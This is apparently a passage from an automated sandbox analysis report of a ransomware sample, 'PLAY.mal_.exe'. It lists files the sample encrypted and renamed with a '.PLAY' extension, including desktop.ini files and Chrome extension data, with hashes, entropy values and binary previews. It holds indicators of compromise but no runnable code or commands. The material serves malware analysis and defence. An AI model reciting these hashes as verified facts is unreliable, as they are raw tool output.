        Preview:'dx...+{U........-G7.Q+%.d....X_..3..... .>o:.,.0..%v{..*H.....`<...].'.+...........#..K.....u........K..C.*w.a.c.j....7]...RQ...:M...q.....AH...E..VLbN.yH}{p.1.......T..U.|.!.I>...........................4.Rc..y#.y)e......^,.^.C...l..Gm.1.f5...*..'........s.7..Ypq.pA...h.f8..P.R...mhI...D..J.?..&,.+.......$.".....a.l...~...`.... ).a..F[.b.k.\...+7..+..u..c..u.v.<.....k..G.....iy........F5.R.f...<:}.AaX.F..._._..E.;:.Ef...b<....K.....EPG.....W.g...........'.. ...^.&0C.,.Fx..1..^.1......j.....j..Z._V8t._..O..6...A....y.=.C...A......J.&.N.n..K.o..5...w..u...*...[N.....=S...F..m...R...[-d.i...0.....+?....}....9uJ...d..`....z.....4d....o..6j....V`..V.,y..._..k.;....T...;.6...f.r..G...5....HB..Y)..0%.....Tjxi.^..h($.*/.]...O...h..v..AH.n5......._..x>...De...-xhm...F.D.F....y..+gd....2.. ...u.......n ....5....>N.Q%.......b!..{.IX...R.;..M....N.T...9..........a......:%.[....//?.F........../YR......E....X.....!.....)i4..H6..J.9.......5..p.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Music\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:COM executable for DOS
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.852568270849338
        Encrypted:false
        SSDEEP:
        MD5:E9A90AB684F88F7787605EDDFF1FA2DA
        SHA1:AB76293517DFE0878CA229D854BD6BF8432B8386
        SHA-256:E30FE938F29CEAAB61F7524AE2C0AEDDE707DF47BE89578AC0A9EBF9658026D3
        SHA-512:0462896BED29CE27D46BF30E43EE86AE1ED1EF62AEAC9C438778DBC28ABB41432579AF1FF187313538B97AF124F8178669C7E54FEB681948F0D623AC074BBCAC
        Malicious:false
        Preview:.....E.,....d......B.ye..z.3..s..N....q ....R}.....v.XF-.'|W=L+..8(s;/..6........!.wc.k9.'R..^n;...A.E..Et...G3...\....+.F...B>>.....Gp..C...C.0...cn!...!0.%........6.X.^.......[....".3...Xm.....`f.R.}zP.!...8...>k.6tFj.T.t...g...z.N\..X...R..V5..b.nM..Q..1..._0...N....[....J{/m/.e.W...tWF...7[....'.a..yE..C.7h=>..?.7..z.I..K.j].j...H0.}J_yb..d.j....dJ....${.V`...T..U.|.!.I>..........................[.0...)..$/..'.*.#x....?4..sU.,l.#<KE.6..&o...!,"-..R..V<2gs....mC2...S>;....Q.a.&[.....S..P,M...y..%...Z..#/Y.0u...;....(.o.J0..1~U..X..%~..g..hwN...D...OZ...q?..'....kRJ.d.Q,...-=..'z.4)G!.... .....l........EYY...;m..S.u........_].U.....BC.=.....!'....$.*LE.v.7...t7.............'z..t...QLb...-...xQ`]c.~..t...l.M.d.7b..t.....,0....>\...(..?..bB...&h.9E..0):..........C@:S....z......sd..c.,.=. ..RpL6.z\>.r.[^/.*^...bE.u(!w.6.!_rF..z........:OB .x...=6.....0_.r.G.yE6.6..?..w.a..I!.5...K{../..7fWMO......NVD.......'..5.X.[... .....S..c.7I..jK.Q

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.858946323909682
        Encrypted:false
        SSDEEP:
        MD5:AA6F7D329E6DE8E74992E517F0000CD5
        SHA1:F2141BE2617C4415973832030DBA3697C24E026E
        SHA-256:199F56CB72541267B3CFC95472D931FA8980B167F8827DFEFAB8137F11C15B5E
        SHA-512:2DD1ECD7E67B4D8C6482951BCD53B56DCC126D2937905EF36ED16C969A4F1CD91DA0C775780CF9D0D6C4D47F5536B1BA98CF0B745FE125926056C4DCF4B0C3FC
        Malicious:false
        Preview:....TL.._.2...%.gBH3.u..J...?.`..Cd.WvL.r[..w<A.\<........B..7..ut...0...C8.`8.....?(..|.]...E.".C.m.-<Z..D...5....#....K.s.....`.....U.m.........bT.......Sf\.......R.........x...*.jF..#...,...m.....+..h..^>}..D..3....,..x:V.4].;.J.d....C..7>.( ..S.#5._.1.#@A*.8..b|e..it.$).x.t$..6.w..xaE..e.'....$.I..R]....+....t.*.s%.U....#!P.....e.rk.).U^..R?.!.d....l.c.n.*14......T..U.|.!.I>...........................`.K..m.[.w..i...dz....z.B.NMiO....,.@3.]..'.W.&...9.diQ4.p........m..@..+.r0.......\....$.QAer........<.yF...*6.N......g..8.....)....G.L.TNut..z...........~.$.S.Y...=...5....P..D..9F.oE.?*P..qz@......M....#|.6.......Ms .5}...7.t}.WD.3..sL.....wK&.4...a.>.U.\=.C.7.o dQ.x.........t..$.{......Z....?..m.....N.....O....!..Z..8.w...n...Ri....s.u-..^v.<...a.h8..T.v..uA.-..@.y..Ms..M...e... \.N'5A<.{...P..|....cg._b>/.x?.a..b.pC..../2...[.s...;.".ZAgj.N...8#W(.&...,.C....j/(..|b=IO0`...T...%+...S...|...P...VMI.w.<.......W.+...n..>.K(V.R.....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Videos\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.828961300467192
        Encrypted:false
        SSDEEP:
        MD5:CD143AD3D59B89050F07AC69CD0486BD
        SHA1:10FABDB4ADCC641372BEC0354058C8052B63E9A4
        SHA-256:8D2B84B7028E9F1C290D64EE23B985DDD583530E16BEA4C9095ECA1EC4720998
        SHA-512:0FDD62473CE4F9FDF52EBBA857466DA5FD92ADFFBFFA0ACB86465C4FC0DA8E09701AC19A4346EE2127D33CE81AAB80B75B55DBEBECC24FF037CCCC686A10FADD
        Malicious:false
        Preview:..5....j.lV..}....n..o..M.otwM...C.(...9..9Y.9....g|G..`....o].1..04..7/S...)...L.b2I.<P#S.0.v.(^.=.....Av.[...!..h.J+........@.Y..T....4....A..q._^A..%......~.9"<..@..."p..y.t.}......:.Z+._.%..j..GP.L.1gp....~.....j*.7..........o.^.y..r.B. ....-..$..=....8}....eN.bvp.Z...}.x:..Y.S...[.my.a..;..2fa.5....[.Ag\.Z...|..x.iH.;.'S&.Q..+..&*.r.x`.......)F..;.....d........T..U.|.!.I>..........................W.A.1N.^.[u./.........8>Yt...Y..\.G8H9...!4[....>.7-.Z'......$b..^...%.$.[..7hu.....o^.....;.[s.-.2..4I.....#M;.f..j.O..........%g.TD..MV.>....&.C......!t.vo...7m....p.{7.|3...zD>........:..............Td8...."m..'.3.4..{&....p.m....n......!.....`".>B.O.v7.'....9ri........&=.'.....^....CaL!. @.?.k.yt...u.%>...7m.n5..,:S.zB...AJ...H.o.......:.O?.w...e...(.g.......h=..U..R.H......i.$.........(..1....m`...?.......{.!9.2@.X#0."...*.M..n..J.m.*a..5M...S|..x8.y@.W%H&N..=..Sc..............U.V..~.%p..m.~.p..3..='.............e....uMf...`#....u

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\DownloadMetadata.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):8248
        Entropy (8bit):7.975594319449011
        Encrypted:false
        SSDEEP:
        MD5:8611076229442312FD1B17E703A323A8
        SHA1:8842EAAD76DB36EA9FC69589DAAE2EFB7BE64B70
        SHA-256:C0494EE583A959D719BC8F1AA8788BB044A0B772F13CE267C3B8A417A8C2DEC9
        SHA-512:0AA0C7693ECEE2CB9CCC28A24EC022320640C110828D87D98E7886431124D1B589840E2818C76D5947CC8D12109F3EF77A28267AEB3D18B8EBA4D286AF27FA8C
        Malicious:false
        Preview:?.r.J...O....m2.U! ....f.O.!z&T.P...H.@[..{..d..%@..?.:....D.1ri....%}....SgYX49..=%.*.-F5}..g.- 5L.z.W.w...g%<.r].bt`.QF?..3I...:.?.G..#.mpJ.x...............7$.......g..T..J_....H.o3=.s./tZ.....4..0.O..=..>.n@~R#./.G~Y.:`.'............YIr...y.h..%L...a...x/$ .:H.?.SZ..pO...kt.S.s.....?...f....3.0\.[.;..h+.f;|.L.<y..+lS6=..... /\*....../...7T..~m..B$)K ..w..9..C.....pe1R......q....'}.%.....<...0}.7<...^..-fA.j[.6.:B0.Z.(H....N..........\F..EZ'...8U.!.."....Y..aRkm..>..=-.v..k.7.....|.....j...zO.P....oV.`K7.fU.8O.%Q..;......b.F...f...d...k.[....s..l...4*Y.:WY*...z...y=.s.+....../N.gQw-4...O...2......GQ....1.u.nd.}R.T..}/...;.:....=..}.)8...:U9..d..m.......R...d~......b..i.W.LF.YN....hL?......,"vS.....;......h..fT..ly.b.)....I...L+..T..[...}...Q.F4.)w*...k4...../.kZ.]..|.Or,.c.{.\....Jx..Z..r&$..]qEW.j....mKV.b...+...;N..tz...(.....{.p...t..#.VS.].......`.R.o........n2.9m....z.}..Z..F...l.6.&.. I .e5@......@..r..B.......

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.990553984125038
        Encrypted:true
        SSDEEP:
        MD5:6C15DA45C3D30849E4A13B8889378999
        SHA1:D7B94D2BBDBDD65AAF5A1D471F913817EE0F2E25
        SHA-256:014F738AB33EACE96EC5D27FECE12C13D135B43C909E35785ADE06A76FDFC819
        SHA-512:2CECFD5A6FDBB094AD87EB120F5FB4A11F81615C11357E217EB8F3F58AB923876CF0B438B4EE188C8FC2503EC6CA91107AB46C42E56225BF12503C550F1BC3A0
        Malicious:true
        Preview:.'].`..]...M....Y..K..................mEJS...x....w.4.*..:U.D.(...mj...........>..-..[....;.2..Z...a.u.X...%.\...'.....l..%.....X.\.,....'f.<9...8..m....4...8a...x.,.BJFI.Hi.@H...<.;.Z.S..~..\.T.6#ej.....Fum/....1..rv..s,hvz.@e....A{....3...F.[..x.(<....{.).....l.......W.b...A...U._..l;.HA......|M@..P..D#............64.\..T.]....?..a...D.k%...J..'84:wrxc.J<7z$Y..OW.Lf.U..""...hf ......H~bbm..].i..[.%..*0....F..2......7Ui..q@W...8]r.C..4Q"....._(......4.a<0.A.....U...p%...f.)sq.%..j....`...T"...........!{.eA/..tn.E`.S.0....1C.q......WV...V...#.j[..\Z\.8.3.....&...........z....v.i..R.6_........i3....7...|n.pg.K.......gF..+b..V.~`..O..}...Z..j.....v..........b&m0.@..+'.;m6.7.#(.5.4{..:.B.........mZ..5.Y-.>:R....h+Z.[K.p...p..lF.1..K.G......O.5>t.......d..|0.1s.^l..G...$7.4.M..f.K..)...AZ..+.'L.L..Vzc.z.i..Xo[.C......W.D..\..v.{2..zAT"F....Y]G.`i....V...u......P.~0Ni......O&..pdl7.CC...&cb.........4..p._.G..g.......D...w..~..`I.T

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\000003.log.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.8337188091597625
        Encrypted:false
        SSDEEP:
        MD5:867CA6678DE3733C5B92ABF44D5B2052
        SHA1:969AA594069EA33D5725F7233E7C566621261159
        SHA-256:AB6E1805B103517FAF84A4EF8BD31B3D974E6A7FF98A424BEE01DB690AFEC396
        SHA-512:7E88F8009FEB0111F1A86F4BAB3D0018B98D581FE84F1B7BA82C291BCB21DFBFF059015134605913E61B72D3C36E1286A875626329AE5D4F5397936CAC2BB77D
        Malicious:false
        Preview:..!..........G..;." x..x^.6.."..Cy...s.....^...w.}N;..W ]....B.D.$`=...7..c...unp.ih....4KiA\z..%*-'..b..q.*..'..m..Z2..Gtx....>)..z:..?K..1..N..gm..I...;...-.ZG.x...b<.y..aX].}on...D@..*..".y.....$..q.....<49..d.=.......D..]...4~...w.?....\...<b.....M+W.*.....Z....ra.mm......k....ie...z..08......bwA..P.j.....AL....{iJH.x.@...:c.<|v.y.........d....T..U.|.!.I>.............................T.....i.M..9...s.......&..~.`7$.hv...Y.m..6..b...U1a7.jl..Ot.GF.<.-.......&..9..$..\e..y.....W............A.~..H4.+.....:..G!..L...Kvi..~..F"..?...W2[.f. n5...l.Y5.?.O.&..p......<....)h%......d....G..y...Kv[......Y.`..g.lOLLw.....Sf.@.(.....A..K.l...|.mh.%..........~.........(..].._z.-.6.v..Yf..?...c.6.[..!1.g.....i...........!B....K..........+4......].3.f.4....e..@Z...:.......g....,s...6..0<=y.:...~.[I..p.q.O..h.p.......5.... ?....%.Kvi..4.tEe...i{KVt.w...@6|^.C.z?.d..T3.l.1.,e..<.c.|.k.t..%..3H...\..uy.c..-f..q....9..y+....ZI...S>.....S..6V...4.Y...b..v.."

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\CURRENT.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.781484319673994
        Encrypted:false
        SSDEEP:
        MD5:FE52C6267D4C4EE9370BD76B34185B06
        SHA1:998A89E6D31AFD6EFB529F1AA0C294BB636B790C
        SHA-256:D1A43051F0760F6D4E2F1DB986CA1815392BE42B5F3D10143A2CC689B257D33D
        SHA-512:CBFEA84008FF12E9387C2D3CB19344218A1FEF1AA76EF6575B1B9A3ACBA1D220FD6FDC31792CE6D59EF6E759731A1065040D05B9D40082C83457385F03214772
        Malicious:false
        Preview:.z...n.5.x...]...@??...R...(C...T..U.|.!.I>..........................T.]+UQw......#2\x....4..........w...ld...5....%.5S7..bC...J.Ue....7.....+U.../.G..Z ....iZ..}....i..."....Z.w...%...ry).r.al..0.T..m..N.G.x...6N..n...u."..e..05.`.?E\......g.....wu....x8.(".."..5..\%...... U6....(=^.._...W{..~]\...s2.'6.%0.n.\..._}0....v......<!.d...'.@lE..|..kd....K.].......O'..z..Wc&&.!Z`.$...T.HUp.T.J.A....Y..]F/...>..q(.....5.u.......t.s..g.`...?Jc(p......;&\..V!.UI%,...m.E.dG-.B,!.r1G.Q....z.=.....UF0..|f.W..q}...Z..\V...R{.p.......z.P.....pr..........#.....8.#.0...G).HFn7...-.w[u.......-sv>..3...n.I.......3I!j...2..^uI.%...W.o.gI.'..".."..b.....f.h.w...,Z...%....P...\)M8.E.,..1..[.".B.]........].. X.b...F...x..T.1.....<.xBF..OYD...V.i..hO...Kc........!.%9.k.M..=bJ......z....^{....>d...o...._.~y..O.R..Z.."..VT.<.nS=.0T......#.........;...uq. ...=.i.{...u.GyN.b.a. ....A50...]#...G.....3..I^g........p..w..b45F.C.W...f..B.0..RO.?.=.....z....PC.....o"..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\LOG.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1384
        Entropy (8bit):7.861536250418777
        Encrypted:false
        SSDEEP:
        MD5:E8EDBF7404EA5D2C0972436A8F1C1AF0
        SHA1:46ED963FE1057C3E22030AEF0AFE8CC3D9382008
        SHA-256:97386E119B8798CB9F03790F7268BD58DBBF7377E57BABBA7FC32C1482EB7067
        SHA-512:DE767DA20CA11EB33584EBDA9ED30E69EFA551BA50CA1E4B28541CBFE7280DBA17750FB2E3879169BA44B3F9ED5A2D2C0CEF6BBDDC5FCFAD4B34CB3906E50683
        Malicious:false
        Preview:._D3_.%......C..3.....q....p..B..$..Mn9%.A....;..zYg..0t.Z.........E.t.|..%........R.f=7Y..........RDw.w.-=.."&.,.q9.....a&U.....]{...o..d.PD.......$*...z.#...L>.+b.=......b0....0.0.v....n...6..d......m.=.F)..4r;q-....2<....K.:.@g....~.k.a..Iq..h2w.c`..\..Y..6...qP.....z.$.4..\..u...+..f.a.gq.z..T..U.|.!.I>............................p..'..*.U ...z.k.).y...{..x......T.6.4....Q"u...nl...._....*?..n...........^"h2.0.:`.t...H..%..@......7c..Y...6... s....d^....m}e&...[l.H..g2.QL."......|5.PqC..............f.....w[{....L..C........-_d... .7./.I..V....)...v.Y..yTv.Wd"An.uh..4.X..=)..R\.?..../..4........,..6..D.J..R..6.b..'..q!..b..U.A.#'...k.i..Cz...M......l~.'..$8....1....`..%...G.^..}dX^..}}(OW..rL....P...Tj."c.a./.\..k..N@@..H..HZx..+.G.......#...@...?..#J..'....(lnm...i...l....p...*.V....j7wS..n........C...D.I^..........ON...[..b..1i+..A..A...1.p.:a..A0..F......W;.F..9 ..u....7D........w...t.~.H...v.=...EJ:9mL..J..{.IxT..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.811722390201178
        Encrypted:false
        SSDEEP:
        MD5:226DA237662763252C7F19E00AF13479
        SHA1:24978272AAF2EA779868BD3A842748B5ABE437BA
        SHA-256:BE67014E9F87C040FB88ADD9D8215F8687069A733F368F40026FEFA85C9AA61C
        SHA-512:7283C93AE1F667FAC05DE559AD1B63825C690EB28D1BF1DC4CE43577C078E6E441383117DFED0F94D9FA58F6F41DBE23C76648E743BAEFF92AD7F7930F7184AD
        Malicious:false
        Preview:.]B.H..g.=7?H.TA.y..*h>.F.q.N._..R......%......T..U.|.!.I>...........................k....;.)...I.&^..Jb..j.&...O.....S..0>.... .Zw...n....X.!....?.q3..\..s....L,R...c.{...8{eU..n..:..........._........Q4?B.DO..5....6y.j.h.. [H.^... .........;|.f*FO7...O...<...'7..Qo..|....G#......u..Q...{.kX.p..-.......t..Ggg....+...;`..FR.ql.... yIF..0$1.F.f...cQ^.a...EY....._j.&5x.n...4Ot..~..4..Rgg......].lbE9..,vz.....]..cU.N.X...(*aM...%..,.......^.Z.g.V..D.;..H.nl.q.C...%.Q:;"..0..._.dQ.L....@W...GO.v.R....R..])...2..{..Q...O...z....`..ED..I._6.'..J...4.2P..\0.&...t.a.$...*...^d:...7>....<,Y.Y..*RY...0x...l...be/`c..D...>.u..7...'..;4S..]t..P..An.Z....6'.....t.K.cp....z.g.OM........#...0...K. .{.H.^..-.C.Un...3C...Y.m......$..xd..V %.`F.-.1|;....N..d..+..s~..=Z.m$v.2Eb.3m9..@j.T/....4...k.TP..2.t.hKee?Q..xb.J.|....C3..&.....:[..G.S.>2T.......P....S.y.iq.....}H7<.....).. %..j1D.}v..h...xV1..Cy....3.=....E.5....M9.*]..Mh.}...@...(.T.~".Y..%

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\000003.log.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1224
        Entropy (8bit):7.822525644197996
        Encrypted:false
        SSDEEP:
        MD5:8C426DBC2A54BC7667D499C956D66570
        SHA1:50FF2EA2787451B88CD4842C2E9443D70BA0D78B
        SHA-256:921B46ABAABC671435F9714F0997695BFA0299184B494CC2A3ED157FAF605495
        SHA-512:79B05E21793943FF376AF0E3CFECD03D8BFA07EF19E0324FA23532A174C16CF192BC0FF81B0343D5C49956E47C561E7AD0A00A1898A1CE3BAD424E65CBA9DD4E
        Malicious:false
        Preview:...D.F...KIZ...@.....w.{r...,l.... Q...Lk....f..........[.@.."Oc...4....m..j.i ....Ub]...~~......;.`}..E.....i...U.U....Fj.DFuU>..&..E6.V<..v.y%D.|....T..U.|.!.I>..........................COc.S..,].......jO..T.DN.L..C..0...:VWX.1...~.,..TM.A.K',...}..q...yZ>1.L..N@....K.....o.AV..+. ...d...k.,..{......C....M..P....x.].j...yub!A._l...U.h...O..v".NB1....n.........B....g.0j.G-.....C.....]x.MU$.l?.W....b.3.k"....t.H.+.#.2....U....Y).........|1.:a.V..8.<...d.}..<..Y.n>Vu...1;.EPx.....q...OI.*b."c. .K1..q....Sb ..T^e....->y....E4d3...b.K.TP@.B.....aW.V,x.0.....w...3.,.Q.g.t.4..z..|.G.....t..12..QB...U..x5.4..&x....}.....u...,.......N\R.K..~.o.t.H ............._...H.M~0b)..i.....M.S....=...`.=Z....UR2D.r...}a"........(_*P&..c.U.......74.........Ne.i.F.....%......\....&.t3..z.'..J..W.3.T...]..'.()._...........QR...'.).M.....g/:Q.&5d...w..&fD1W..`b.......<s...~.[.]..CzM.v....j..u....f..m3.u!g[v.$6...c...g(.Z..-..Q........t.R.#E.NP.0.u.;t...&

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\CURRENT.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.789440414826143
        Encrypted:false
        SSDEEP:
        MD5:67560384118EC69557DB05861354ED36
        SHA1:E254252B8FA4F7DD9DB94C9C3443029AAD71FBFE
        SHA-256:37EFBFFAFF83DBABB772FF00691A9BE8430AAD4F047F0E2D1A6C3F8E00FB4A99
        SHA-512:7437B12206810A22D85342851CBE316905FC53E9A3458F78F8C65B119D05DC11673C390C277D66D1753FEF205AB92C37C153A72171D947017D004BC19CF508B1
        Malicious:false
        Preview:...SG.M......E.."...._X...zB^%..T..U.|.!.I>........................../ .9.Q G..1...H.j.hK..bZ......r.\..=..=G$......t.4.H.I.....n..u....!.^..@...w..^H...~{q..p`..5>....E..&pPQL......3j...u.7DlB...L5"...sl}.SZp(...lk..W&jf.$.."..>.j.]...].B.%!.9..gii...BF..yF..K`N?.[..Hy.1..C......../..4.8K...=......M......1'....9...l[....T...o....L:y.....>.........DT.<...Q,.HL]f..9k.e.....`....X.....p.l....X...g....w.`j.3..jg...{..a...z.[f..o.L.o0L,...rFT....g.&.HH..DI..SB.D5;...g)0L\.tC..V.....L.,o.~.X.{|_J6...cj....).qO.5...J....osVk..w..AX...H.......Bw..m...~..|Nk....(...~=.....%.....B..e_...O.T.v\...O.,u...6.`..DF.D<.......#F.i ..jN"C.....<..G......(.G...tH.....Gs.nX!i.>.l..p.p4.<...#.baiDp`..Il..@Ct.7...e.9.-.$UW6U..^.Zp%..1R...Cg.p.p.....Qs.wsI...R|..OLE.....c..}......9%....?,......8....\...........m.k%j........N...."^x....Y..}.go....=.C.8t...N...M.U.W.]7..7B:...F]B..R..#-.U..e.......%...=.....W."...7..d.|t...{.RY..X...t..L...]a\.1..bn@.....q......

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\LOG.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1352
        Entropy (8bit):7.843461520570139
        Encrypted:false
        SSDEEP:
        MD5:30F91F1E0565392656756B68657743A8
        SHA1:AF8042643B8026BB78BE825D525B0A5BC931538A
        SHA-256:466E4C8FD903C34C209500FDB4FC4AB877F4EDBC22CA47F7359F0B8CB6F40D09
        SHA-512:08099BACB275CCEE153811E83E258360DE2FB154607C2C0031B2A1F6E507EA346595E99963E3136C240D208E7909BDF7CEF95FD748B624AAF955BF4FBFE884B7
        Malicious:false
        Preview:..6..d..PT\R6+..[.).<...N.).`!h&..j.M.........`.9...|./....8.A~.......<M?>v..-..3. .?..9..(.\0,BD....JY.n..P.K..V.:.d....R$..!...&...ijW..T...-...U....M.5.H..'.....AU..A~...f.....C...Q.......y..2-...".+p@i...?.}.9%.W.}.h..tr..E.{...........(..w.....S[.f......m.$%...|.:...T..U.|.!.I>.............................c...d7d....P...J..^.F>...S.QC...r....1...y"..'...L.z.....$....IA..u.... F.Uj..,...1{...v./^..g...._...8.o.~e.8F.....{....h96.:<..k..I$...\.I.{.S .[1....I...sd...L...M.....*.........v...C.+..\.F}z...B._J.v....3...X.J.?_.s..d..t......m...8.9...j7...I...o....-,.6w...".."...7...rC.G#Q..f._!:..*.p..uzv|st..vi....A/...B.1..hm.0.z.{p.....@...Yk#..%./.....D.R..%....a.O.o...<..w. .N.c..v...$Y*..t...W.4.@.^.T.;Y.GZ+..>.,..^@...}.Rb.S..o.......2..;..V....Df........*..A@..M|Hw..k....l.V[....0....O...G..*.kDobpD..;.|V....Z...~tI.........Y....m6....`....N......r..guO.....y..F..._;.(..]..}8:..._q..[..$..jy.V.!..1..~T.$\o)h.0..4&x..ze.....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.803125943147033
        Encrypted:false
        SSDEEP:
        MD5:AFB55939AA3F974D2676E12BE5C0B2D7
        SHA1:FA9C4BAE780B14E17E411A6CE004CB749FB4EB8A
        SHA-256:B5933F16F451255924EB52239403666D7B71407F8333E629D3978AEDCB985BB3
        SHA-512:8DF48CEA23876D2B3F46A05966960A64E5A357CBC6F24BF8CEEBDD447E548F462669CAB0C80BE112387FB36CA2531466A211BAE76D1132856A2B470F94042670
        Malicious:false
